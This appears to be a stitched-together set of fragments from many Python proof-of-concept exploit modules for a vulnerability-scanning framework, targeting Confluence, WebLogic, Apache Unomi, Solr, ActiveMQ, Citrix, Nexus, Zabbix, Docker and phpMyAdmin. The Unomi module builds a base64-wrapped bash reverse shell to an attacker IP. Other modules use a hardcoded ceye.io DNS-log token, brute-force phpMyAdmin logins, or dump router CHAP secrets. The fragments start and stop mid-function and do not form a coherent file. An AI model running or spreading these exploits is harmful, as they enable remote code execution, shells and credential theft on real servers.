target_url = vul_url
if self.is_vulnerable():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
def is_vulnerable(self):
#TODO
return True
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register_poc(Confluence_3396_POC)
register_poc(Confluence_3398_POC)
#register_poc(Confluence_3394_POC)
'Cookie': "sidebar_collapsed=false",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
'Content-Length': "1001",
'cache-control': "no-cache"
}
try:
requests.post(veri_url, data=payload, headers=headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(WebLogicWlsAsyncRCE)
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
#自定义输出函数,调用框架输出的实例Output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("not vulnerability")
return output
#注册PoC类,这样框架才知道这是PoC类
register_poc(ApacheUnomiCVE202013942POC1)
result['VerifyInfo']['URL'] = url
#result['VerifyInfo']['POC'] = path
except Exception as e:
return
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(testPOC)
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['body'] = data
except Exception as e:
return
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(POC)
}
return headers
def _verify(self):
result = {}
payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31'
try:
target = self._get_url + payload
response = requests.get(url=target, headers=self._headers)
if 'Dashboard' in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Not vulnerability')
return output
register_poc(Zabbix)
def test_dnslog(self, url):
resp = req.get(url)
d = resp.json()
try:
name = d['data'][0]['name']
if self.BANNER in name:
return True
except Exception:
return False
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register_poc(Solr_RCE_0193)
register_poc(Solr_RCE_0192)
register_poc(Solr_RCE_17558)
register_poc(Solr_RCE_12409)
def test_dnslog(self, url):
resp = req.get(url)
d = resp.json()
try:
sub_domain = d['data'][0]['domain']
if self.BANNER in sub_domain:
return True
except Exception:
return False
def test_command(self, p_output):
# 分别对应echo命令(Windows)的回显和id命令(*nix)的回显
return re.search(self.BANNER, p_output) or "uid=" in p_output
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register_poc(Solr_RCE_12409)
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
response = requests.get(url=vuln_url, headers=headers)
if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['Path'] = vuln_url
return self.parse_output(result)
else:
return self.parse_output()
def _verify(self):
return self.POC_1()
def _attack(self):
return self.POC_1()
def parse_output(self, result={}):
output = Output(self)
if result and len(result.keys()) != 0:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPoc)
vulType = 'Unauthrized Access'
desc = '''
Docker Remote API Unauthrized Access
'''
def _verify(self):
result = {}
try:
url = self.url + "/info"
res = requests.get(url)
if res.status_code == 200 and res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = url
except Exception as e:
logger.info(e)
return self.parse_ouput(result)
def _attack(self):
return self._verify()
def parse_ouput(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not docker vulnerability')
return output
register_poc(Docker)
t = resq.text
t = t.replace('\n', '').replace('\r', '')
print('output >>> ' + t)
t = t.replace(" ", "")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception as e:
return
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(rj_get_token)
try:
resq = requests.get(url=url+payload)
t = resq.text
t = t.replace('\n', 't').replace('\r', '')
print('输出文件内容 >>> '+t)
t = t.replace(" ","")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception as e:
return
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(OpenSNSPOC)
try:
r2 = requests.post(url=pocurl,
headers=headers,
data=pocxml,
verify=False)
if r2.status_code == 200 and 'XML-RPC' in r2.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = r2.text
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _attack(self):
return self._verify()
def _shell(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("not vulnerability")
return output
register_poc(ApacheOFBizCVE20209496POC)
content = re.search(r'server_cond=[\S\s]+?[\S\s]"', t).group()
print('output >>> ' + content)
t = t.replace(" ", "")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = t
except Exception as e:
return
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(ZhongQingPOC)
filename = self.random_str(6)
flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % (
filename)
s.send(flag.encode())
s.recv(1024)
s.close()
url = 'http://' + ip + ":" + str(
port) + '/styles/%s.txt' % (filename)
res_html = requests.get(url).text
if 'big04dream' in res_html:
result["VerifyInfo"] = {}
result['VerifyInfo']['IP'] = ip
result['VerifyInfo']['Payload'] = flag
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not activemq vulnerability')
return output
register_poc(ActiveMQ)
# if zonetransfers:
# print("\tZone transfers possible:")
# for zone in zonetransfers:
# print(zone)
def _verify(self):
result = {}
pr = urlparse(self.url)
target = '{}'.format(pr.hostname)
# logger.info(target)
zonetransfers_info = self.dns_zonetransfer(target)
if zonetransfers_info:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}'.format(pr.hostname)
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(DNSPOC)
# print(url)
try:
res = self.safe_atk(base_url, True)
# print(res)
if res['chapsecrets'][0] == "OK":
f = open("/tmp/res.json", 'a+')
json.dump(res, f, indent=4, ensure_ascii=False)
f.close()
logger.info("Result saved in res.json")
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = base_url
result['VerifyInfo']['SavePath'] = "/tmp/res.json"
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(VigorPOC)
def _verify(self):
result = {}
# print(self.url)
url = self.url
# print(url)
try:
for username, password in self.get_word_list():
if self.pma_login(url, username.strip(), password.strip()):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Username'] = username.strip()
result['VerifyInfo']['Password'] = password.strip()
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(PmaBurstPOC)
category = POC_CATEGORY.PROTOCOL.HTTP
def _verify(self):
result = {}
# print(self.url)
url = self.url
# print(url)
try:
resp = requests.get(url, verify=False, timeout=5)
if resp.status_code != 404:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['PoC'] = str(resp.status_code)
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(HTTPXPOC)
break
local_socket.send(self.malformed_heartbeat)
return self.send_n_catch_heartbeat(local_socket)
def _verify(self):
result = {}
try:
host = self.url.split('//')[1]
port = 443
if self.check_heardbeat(host=host.encode(), port=port):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = host
result['VerifyInfo']['INFO'] = 'target %s vulnerability' % host
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not heartbleed vulnerability')
return output
register_poc(HeartBleed)
def _verify(self):
result = {}
payload = 'ws_utc/resources/setting/options/general'
try:
if self.url[-1] == '/':
url = self.url + payload
else:
url = self.url + '/' + payload
response = requests.get(url=url, headers=self._headers)
if response.status_code != 404:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(Weblogic)
cmd2 = 'ping ' + cmd
if self.upload_xml(cmd):
xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % 'bigdream'
headers = {"NSC_USER": "******", "NSC_NONCE": "nsroot"}
r = requests.get(xml_url, headers=headers, verify=False)
if r.status_code == 200:
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = cmd2
except Exception as e:
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(Citrix)
return _l_auth_headers
# 验证EL表达式被执行
def test_EL(self, p_resp):
d = p_resp.json()
result = d['result']['errors']['roles']
logger.info(result)
try:
if str(self.ran_sum) in result:
return True
except Exception:
return False
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(Nexus3_2020_10204_EL_INJECTION_POC)
except:
pass
return self.parse_output(result)
@property
def _headers(self):
headers = {
'User-Agent':
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0",
'Accept': "*/*",
'Content-Type': "application/json",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close",
'Cache-Control': "no-cache"
}
return headers
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(Nexus)
match_string = "Unknown column 'watch_dog' in 'field list'"
if url_parse.query:
qs = parse_qs(url_parse.query)
for i in qs:
query_list = []
query_list.append(i+'[]'+'='+'bind'+'&'+i+'[]'+'='+payload)
for a in qs:
if a == i:
continue
query_list.append(a+'='+qs[a][0])
query = '&'.join(query_list)
url = url_parse.scheme+'://'+url_parse.netloc+url_parse.path+url_parse.params+'?'+query
try:
req = requests.get(url)
if match_string in req.text:
print(req.text)
print("success")
except Exception as e:
pass
def _attack(self):
return self._verify()
register_poc(Testpoc)
appPowerLink = ''
appName = 'php-fpm and nginx'
appVersion = 'all'
vulType = 'rce'
desc = '''
PHP-fpm 远程代码执行漏洞(CVE-2019-11043)
'''
samples = ['']
install_requires = ['']
def _verify(self):
result = {}
test = PhpUip(self.url + '/index.php')
if test.poc():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Not vulnerability')
return output
register_poc(PHPFPM)
"Referer": self.url +
"/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
result['FileInfo'] = {}
result['FileInfo']['Filename'] = filename
result['FileInfo']['Content'] = content
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
str_resp_json = str(resp.json())
# 响应头为200 且json响应字符串包含columns和user,则认为查询成功
if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
traceback.print_stack()
return self.save_output(result)
#漏洞攻击
def _attack(self):
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(InfluxDB_POC)
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [7001, 17001, 27001]
for port in ports:
uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
status, msg = check(pr.hostname, port)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = uri
result['extra'] = {}
result['extra']['evidence'] = msg
break
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)
headers = {'Authorization': 'Basic' + ' ' + auth}
return headers
# 验证EL表达式被执行
def test_EL(self, p_resp):
d = p_resp.json()
result = d['result']['errors']['roles']
print(result)
print(self.ran_sum)
try:
if str(self.ran_sum) in result:
return True
except Exception:
return False
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register_poc(Nexus3_2018_16621_EL_INJECTION_POC)
